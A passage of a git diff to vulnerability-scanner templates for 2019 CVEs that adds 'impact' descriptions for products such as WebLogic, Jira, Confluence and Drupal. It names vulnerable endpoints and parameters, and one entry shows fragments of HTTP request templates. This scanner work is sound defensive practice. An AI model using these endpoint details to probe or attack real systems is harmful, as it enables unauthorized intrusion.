a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 92af704750..ad7a59c234 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system. remediation: | Apply the latest security patches provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 2626c86602..7629d3c27b 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 59dbfdc84c..9a411a6fc0 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -5,6 +5,8 @@ info: author: TechbrunchFR,milo2012 severity: medium description: Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + The vulnerability allows unauthorized users to access sensitive information or perform unauthorized actions. remediation: Ensure this permission is restricted to specific groups that require it via Administration > System > Global Permissions. Turning the feature off will not affect existing filters and dashboards. If you change this setting, you will still need to update the existing filters and dashboards if they have already been shared publicly. Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. reference: - https://jira.atlassian.com/browse/JRASERVER-69244 diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index f6f653ee44..bdb8450b61 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement. remediation: | Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 9e44d8d3a8..bfa23f15b1 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: medium description: Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access. + impact: | + This vulnerability can lead to unauthorized access to sensitive data, potential data breaches, and unauthorized actions within the Jira system. remediation: | Apply the latest security patches and updates provided by Atlassian to fix the vulnerability and ensure proper authorization controls are in place. reference: diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 30d168a8bb..9de5f19aad 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 1540eb3410..cbfc657859 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index b48df5eab6..619fd99c3b 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 959857279c..ea4e48cf1d 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_ severity: critical description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 678f521075..9b8678c6d3 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. remediation: | Apply the latest patch or upgrade to a version that is not affected by this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index ca762267b4..bdf27fab1d 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -5,6 +5,8 @@ info: author: omarkurt severity: high description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the patch provided by the Rails team or upgrade to a version that includes the fix. reference: diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index ee3364ce0f..8f07bea5cb 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or upgrade to a newer version of Revive Adserver. reference: diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 8ee57782c1..4fecb8aecf 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of WordPress Sell Media or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 553ab1b2fa..cba41a2453 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Drupal site. remediation: | Apply the official security patch provided by Drupal to fix the deserialization vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index d8e67ef730..71c7fa8274 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php. + impact: | + An unauthenticated attacker can read sensitive files or traverse directories on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of W3 Total Cache plugin (0.9.3 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index eefec8e909..b5c9c2aeb9 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index c3acdeaf73..1931a0178e 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station. reference: diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 672f13dbd9..ccf5546c1a 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead. reference: - https://github.com/verifysecurity/CVE-2019-7219 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 67aeaeb7f0..18e18b7ce1 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Sonatype Nexus Repository Manager to a version higher than 3.15.0. reference: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 7941fd74d0..0e0ffa3ef0 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Linear eMerge E3-Series devices are vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patch or update to a non-vulnerable version of eMerge E3. reference: diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index ec689977bb..72eea519b6 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index d0182f2e2a..fa462fafc9 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update to a non-vulnerable version of eMerge E3. reference: diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 8a7e97309a..3df0617824 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or updates provided by Optergy to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 8ad6f5140f..4050514737 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. remediation: | Apply the latest firmware update provided by the vendor to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 24fa81fe0e..04f1718ce0 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -5,6 +5,8 @@ info: author: _darrenmartyn severity: high description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 5d45da230f..e2a024de66 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of KindEditor or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index c84527d2f4..5799b7b432 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + impact: | + Arbitrary code execution can result in unauthorized access, data leakage, and system compromise. remediation: | Apply the latest security patches or upgrade to a patched version of Kibana to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 41a23a3590..e7adcb074d 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: high description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution. remediation: | Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. reference: diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 4c13e7fb2c..3f25c2186c 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index d7e40df32a..542b2b14ec 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -5,6 +5,8 @@ info: author: Kishore Krishna (siLLyDaddy) severity: high description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion. + impact: | + This vulnerability can result in sensitive information exposure, unauthorized access to files, and potential compromise of the Jira application. remediation: | Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 3229b25e29..d96137d3f5 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application. remediation: | Apply the latest security patches and updates provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index d4b9e40d57..89d11c29a3 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. remediation: | Upgrade Jira to version 8.4.0 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index dd8e8a2557..db52ae8465 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -5,6 +5,8 @@ info: author: TechbrunchFR severity: medium description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Upgrade Jira to version 8.4.0 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index fb7cb9cab8..55490e25cb 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index b39fa59d00..da04524349 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks. reference: diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 0cfcdbe715..c176a17757 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery." + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive files and potential server-side request forgery attacks. remediation: | Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities. reference: diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 9ff4d664af..83cc741e71 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -5,23 +5,25 @@ info: author: pikpikcu severity: high description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patch or upgrade to a newer version of ZZZCMS. reference: - https://www.exploit-db.com/exploits/46454/ - http://www.iwantacve.cn/index.php/archives/118/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9041 - remediation: | - Apply the latest security patch or upgrade to a newer version of ZZZCMS. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-9041 cwe-id: CWE-917 - cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* epss-score: 0.01127 + cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* metadata: max-request: 2 - product: zzzphp vendor: zzzcms + product: zzzphp tags: cve,cve2019,zzzcms,rce,edb http: @@ -30,7 +32,6 @@ http: POST /search/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /search/ HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index c308c0b525..2ad4e105b2 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -5,6 +5,8 @@ info: author: ree4pwn severity: critical description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, leading to unauthorized access to sensitive information. remediation: | Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index f356b5b6a6..ff6a987275 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. remediation: | Apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 15f90d1a07..c42d8056df 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -5,6 +5,8 @@ info: author: akshansh severity: critical description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory. + impact: | + Successful exploitation allows unauthorized access to the admin panel. remediation: | Upgrade to a patched version of JFrog Artifactory or apply the necessary security patches. reference: diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index ed0c037ff6..59e76eb84a 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to the latest version of GetSimple CMS to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index 1b317482b8..a73df11600 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of 